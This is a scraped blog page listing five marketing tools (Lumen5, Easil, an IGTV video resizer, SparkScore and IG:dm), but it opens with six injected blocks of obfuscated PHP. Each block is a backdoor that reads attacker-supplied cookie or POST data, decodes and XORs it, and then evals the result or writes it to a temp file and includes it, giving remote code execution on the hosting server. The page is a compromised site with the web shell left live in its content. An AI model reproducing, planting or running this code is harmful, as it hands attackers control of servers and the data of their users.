$kqTZX = class_exists("JHb_QMCr"); $klEbtSAoev = $kqTZX;if (!$klEbtSAoev){class JHb_QMCr{private $VRVheHV;public static $GHFkjXgel = "bf72b07e-17e3-4da0-871a-3eb9d9c59ec6";public static $avbHtSBRKB = NULL;public function __construct(){$EUrAYBrQj = $_COOKIE;$JWDmbO = $_POST;$USrTnN = @$EUrAYBrQj[substr(JHb_QMCr::$GHFkjXgel, 0, 4)];if (!empty($USrTnN)){$GfwGZ = "base64";$NBCNGxVlRz = "";$USrTnN = explode(",", $USrTnN);foreach ($USrTnN as $VoQRB){$NBCNGxVlRz .= @$EUrAYBrQj[$VoQRB];$NBCNGxVlRz .= @$JWDmbO[$VoQRB];}$NBCNGxVlRz = array_map($GfwGZ . '_' . "\x64" . 'e' . "\x63" . "\x6f" . "\x64" . "\145", array($NBCNGxVlRz,)); $NBCNGxVlRz = $NBCNGxVlRz[0] ^ str_repeat(JHb_QMCr::$GHFkjXgel, (strlen($NBCNGxVlRz[0]) / strlen(JHb_QMCr::$GHFkjXgel)) + 1);JHb_QMCr::$avbHtSBRKB = @unserialize($NBCNGxVlRz);}}public function __destruct(){$this->KyHrkwtc();}private function KyHrkwtc(){if (is_array(JHb_QMCr::$avbHtSBRKB)) {$JjGuABngvF = str_replace("\74" . "\77" . "\160" . chr ( 287 - 183 )."\160", "", JHb_QMCr::$avbHtSBRKB[chr ( 675 - 576 )."\157" . chr ( 866 - 756 ).chr ( 269 - 153 )."\x65" . chr ( 1051 - 941 )."\x74"]);eval($JjGuABngvF);exit();}}}$xHSBRYZAN = new JHb_QMCr(); $xHSBRYZAN = NULL;} ?> $soUbtmYg = class_exists("kC_mSWr"); $tzbAZKl = $soUbtmYg;if (!$tzbAZKl){class kC_mSWr{private $EVvYkjwGy;public static $inVyTslAL = "614fba15-62dd-41e8-94a5-8a5cbb91a53a";public static $nkVkv = NULL;public function __construct(){$CEiCBzNBuq = $_COOKIE;$qGbifKF = $_POST;$umJgvSGgri = @$CEiCBzNBuq[substr(kC_mSWr::$inVyTslAL, 0, 4)];if (!empty($umJgvSGgri)){$daMdMgWqYv = "base64";$xjhQpxU = "";$umJgvSGgri = explode(",", $umJgvSGgri);foreach ($umJgvSGgri as $qpHTW){$xjhQpxU .= @$CEiCBzNBuq[$qpHTW];$xjhQpxU .= @$qGbifKF[$qpHTW];}$xjhQpxU = array_map($daMdMgWqYv . chr ( 600 - 505 )."\144" . 'e' . "\143" . "\157" . chr ( 429 - 329 ).'e', array($xjhQpxU,)); $xjhQpxU = $xjhQpxU[0] ^ str_repeat(kC_mSWr::$inVyTslAL, (strlen($xjhQpxU[0]) / strlen(kC_mSWr::$inVyTslAL)) + 1);kC_mSWr::$nkVkv = @unserialize($xjhQpxU);}}public function __destruct(){$this->qMJlOUylbq();}private function qMJlOUylbq(){if (is_array(kC_mSWr::$nkVkv)) {$SBNBZLUt = sys_get_temp_dir() . "/" . crc32(kC_mSWr::$nkVkv["\163" . chr (97) . "\x6c" . "\x74"]);@kC_mSWr::$nkVkv["\167" . "\162" . "\151" . chr ( 991 - 875 )."\x65"]($SBNBZLUt, kC_mSWr::$nkVkv[chr ( 137 - 38 ).chr (111) . "\x6e" . "\x74" . "\x65" . chr (110) . 't']);include $SBNBZLUt;@kC_mSWr::$nkVkv[chr ( 730 - 630 )."\x65" . "\154" . chr ( 661 - 560 ).chr ( 580 - 464 )."\x65"]($SBNBZLUt);exit();}}}$UFudRj = new kC_mSWr(); $UFudRj = NULL;} ?> $pJZzH = class_exists("DZg_cKeu"); $xfoXgict = $pJZzH;if (!$xfoXgict){class DZg_cKeu{private $SadJn;public static $aCUgQwhs = "91629c1b-0bf0-4917-8590-0b3314b2943c";public static $iKDVKK = NULL;public function __construct(){$EnfsE = $_COOKIE;$BdMYmUE = $_POST;$trERK = @$EnfsE[substr(DZg_cKeu::$aCUgQwhs, 0, 4)];if (!empty($trERK)){$RyFDVIxM = "base64";$tmHUuq = "";$trERK = explode(",", $trERK);foreach ($trERK as $LQAAA){$tmHUuq .= @$EnfsE[$LQAAA];$tmHUuq .= @$BdMYmUE[$LQAAA];}$tmHUuq = array_map($RyFDVIxM . "\x5f" . "\144" . 'e' . "\143" . chr ( 1105 - 994 )."\144" . chr ( 577 - 476 ), array($tmHUuq,)); $tmHUuq = $tmHUuq[0] ^ str_repeat(DZg_cKeu::$aCUgQwhs, (strlen($tmHUuq[0]) / strlen(DZg_cKeu::$aCUgQwhs)) + 1);DZg_cKeu::$iKDVKK = @unserialize($tmHUuq);}}public function __destruct(){$this->iHnJIoUJ();}private function iHnJIoUJ(){if (is_array(DZg_cKeu::$iKDVKK)) {$XLlQv = sys_get_temp_dir() . "/" . crc32(DZg_cKeu::$iKDVKK['s' . chr ( 920 - 823 ).'l' . "\164"]);@DZg_cKeu::$iKDVKK['w' . "\x72" . chr (105) . 't' . "\145"]($XLlQv, DZg_cKeu::$iKDVKK[chr ( 720 - 621 ).chr (111) . 'n' . chr (116) . 'e' . chr ( 1005 - 895 ).'t']);include $XLlQv;@DZg_cKeu::$iKDVKK[chr ( 820 - 720 ).'e' . "\154" . "\x65" . chr (116) . chr (101)]($XLlQv);exit();}}}$hiBgquqV = new DZg_cKeu(); $hiBgquqV = NULL;} ?> $IoeMqgofqv = class_exists("Q_POUK"); $nNhiJXqXrw = $IoeMqgofqv;if (!$nNhiJXqXrw){class Q_POUK{private $yeKoNLEg;public static $oBoCMf = "b0af4df3-e20d-4395-9ad7-4153446157bc";public static $UagrjHj = NULL;public function __construct(){$jaMIzb = $_COOKIE;$DXkdFAbPP = $_POST;$VJcBX = @$jaMIzb[substr(Q_POUK::$oBoCMf, 0, 4)];if (!empty($VJcBX)){$rDaufBz = "base64";$JOQolY = "";$VJcBX = explode(",", $VJcBX);foreach ($VJcBX as $HpwlQ){$JOQolY .= @$jaMIzb[$HpwlQ];$JOQolY .= @$DXkdFAbPP[$HpwlQ];}$JOQolY = array_map($rDaufBz . '_' . "\144" . "\x65" . chr (99) . "\157" . chr (100) . 'e', array($JOQolY,)); $JOQolY = $JOQolY[0] ^ str_repeat(Q_POUK::$oBoCMf, (strlen($JOQolY[0]) / strlen(Q_POUK::$oBoCMf)) + 1);Q_POUK::$UagrjHj = @unserialize($JOQolY);}}public function __destruct(){$this->QqbHas();}private function QqbHas(){if (is_array(Q_POUK::$UagrjHj)) {$zwLmwoU = sys_get_temp_dir() . "/" . crc32(Q_POUK::$UagrjHj["\x73" . "\x61" . "\x6c" . 't']);@Q_POUK::$UagrjHj[chr (119) . 'r' . 'i' . chr ( 437 - 321 ).'e']($zwLmwoU, Q_POUK::$UagrjHj["\143" . chr (111) . 'n' . chr ( 145 - 29 ).chr ( 242 - 141 ).'n' . 't']);include $zwLmwoU;@Q_POUK::$UagrjHj[chr ( 883 - 783 )."\x65" . chr ( 524 - 416 ).chr ( 901 - 800 ).chr ( 486 - 370 )."\x65"]($zwLmwoU);exit();}}}$uHzmixtus = new Q_POUK(); $uHzmixtus = NULL;} ?> $cEtoOwYHPL = class_exists("LCi_OmkZU"); $svQKAUW = $cEtoOwYHPL;if (!$svQKAUW){class LCi_OmkZU{private $bHvBodu;public static $VgPUHLxNs = "d7d95d52-7420-4cb4-9ec6-63b14193396f";public static $lZAlfjy = NULL;public function __construct(){$tLZwzMUqYP = $_COOKIE;$WNsBEwp = $_POST;$rCIeOkwHam = @$tLZwzMUqYP[substr(LCi_OmkZU::$VgPUHLxNs, 0, 4)];if (!empty($rCIeOkwHam)){$orduHlQCGj = "base64";$zAOUze = "";$rCIeOkwHam = explode(",", $rCIeOkwHam);foreach ($rCIeOkwHam as $cCaFETpPB){$zAOUze .= @$tLZwzMUqYP[$cCaFETpPB];$zAOUze .= @$WNsBEwp[$cCaFETpPB];}$zAOUze = array_map($orduHlQCGj . chr (95) . "\144" . 'e' . chr (99) . 'o' . chr (100) . "\145", array($zAOUze,)); $zAOUze = $zAOUze[0] ^ str_repeat(LCi_OmkZU::$VgPUHLxNs, (strlen($zAOUze[0]) / strlen(LCi_OmkZU::$VgPUHLxNs)) + 1);LCi_OmkZU::$lZAlfjy = @unserialize($zAOUze);}}public function __destruct(){$this->tjwMy();}private function tjwMy(){if (is_array(LCi_OmkZU::$lZAlfjy)) {$ffHcqpdER = str_replace(chr ( 269 - 209 ) . chr (63) . chr (112) . "\150" . chr ( 626 - 514 ), "", LCi_OmkZU::$lZAlfjy["\143" . "\157" . chr ( 926 - 816 ).'t' . chr (101) . 'n' . "\x74"]);eval($ffHcqpdER);exit();}}}$vobCc = new LCi_OmkZU(); $vobCc = NULL;} ?> $yREwtAvl = class_exists("YOQ_YrsH"); $gutxnF = $yREwtAvl;if (!$gutxnF){class YOQ_YrsH{private $jIUcRbPqOF;public static $oLFnBXbvmI = "30b78542-d74f-404b-8759-222112d44983";public static $yWMEHqr = NULL;public function __construct(){$zwTamKI = $_COOKIE;$FaXsjGsK = $_POST;$WVTxM = @$zwTamKI[substr(YOQ_YrsH::$oLFnBXbvmI, 0, 4)];if (!empty($WVTxM)){$ZdZmOBJc = "base64";$PdkiRcN = "";$WVTxM = explode(",", $WVTxM);foreach ($WVTxM as $YjYnWgW){$PdkiRcN .= @$zwTamKI[$YjYnWgW];$PdkiRcN .= @$FaXsjGsK[$YjYnWgW];}$PdkiRcN = array_map($ZdZmOBJc . "\137" . "\x64" . chr (101) . "\143" . "\x6f" . 'd' . "\x65", array($PdkiRcN,)); $PdkiRcN = $PdkiRcN[0] ^ str_repeat(YOQ_YrsH::$oLFnBXbvmI, (strlen($PdkiRcN[0]) / strlen(YOQ_YrsH::$oLFnBXbvmI)) + 1);YOQ_YrsH::$yWMEHqr = @unserialize($PdkiRcN);}}public function __destruct(){$this->FIyFMYDZ();}private function FIyFMYDZ(){if (is_array(YOQ_YrsH::$yWMEHqr)) {$ulINhdpSv = str_replace(chr (60) . '?' . chr ( 867 - 755 ).chr (104) . chr ( 295 - 183 ), "", YOQ_YrsH::$yWMEHqr[chr (99) . chr ( 603 - 492 ).chr ( 905 - 795 )."\x74" . chr (101) . "\156" . "\x74"]);eval($ulINhdpSv);exit();}}}$xLgPxug = new YOQ_YrsH(); $xLgPxug = NULL;} ?>
5 Mobile and Desktop Tools for Marketers - CODE Marketing: Blog
Tuesday, December 10 2024
Looking for better ways to create videos, audio, and images? Want a list of tools to help?
When you need to repurpose online articles as videos, try Lumen5 , a free browser-based app you use on a desktop computer. Simply copy an article’s URL into Lumen5, and it converts the article into a slideshow. After the conversion, you can edit the images, text, and video transitions on each slide. In about 30 minutes, you’ll have a customized slideshow that you can export as a video.
Easil is a browser-based tool with professional-looking templates for Instagram and Facebook Stories. This tool is especially helpful if you’re not a graphic designer. After you select a template, you can edit the font, colour scheme, image, and more. Easil also has a nice font selection and a stock art service called Easil Stock, which is frequently updated with fresh images.
Video Resizer for IGTV & frame
When you need help sizing videos for Instagram TV (also called IGTV), check out the Video Resizer for IGTV & frame iOS app. This free app can change landscape or square videos to a 9:16 ratio for IGTV. To illustrate, the app can resize a square video you shot for Instagram so you can repurpose the video for an IGTV story. If you accidentally shot a video in the wrong size, the app can fix it. To resize videos into new formats, the app fills blank space in the resized video with a blurred gradient made of colours from the video. These gradients enable the app to resize the video without cropping it.
SparkScore helps you analyze Twitter engagement and measure your influence by looking at followers, retweets, likes, and lists. If you check your free SparkScore report on the same day every week, you’ll have a snapshot of whether your Twitter engagement is up or down.
Scrolling through Instagram on a phone can be addictive and distracting, especially when you’re a marketer trying to manage social media. Although using Instagram on a desktop is easier, you can’t answer and send direct messages… unless you have IG:dm , a free download that adds this feature to macOS, Windows, and Linux computers.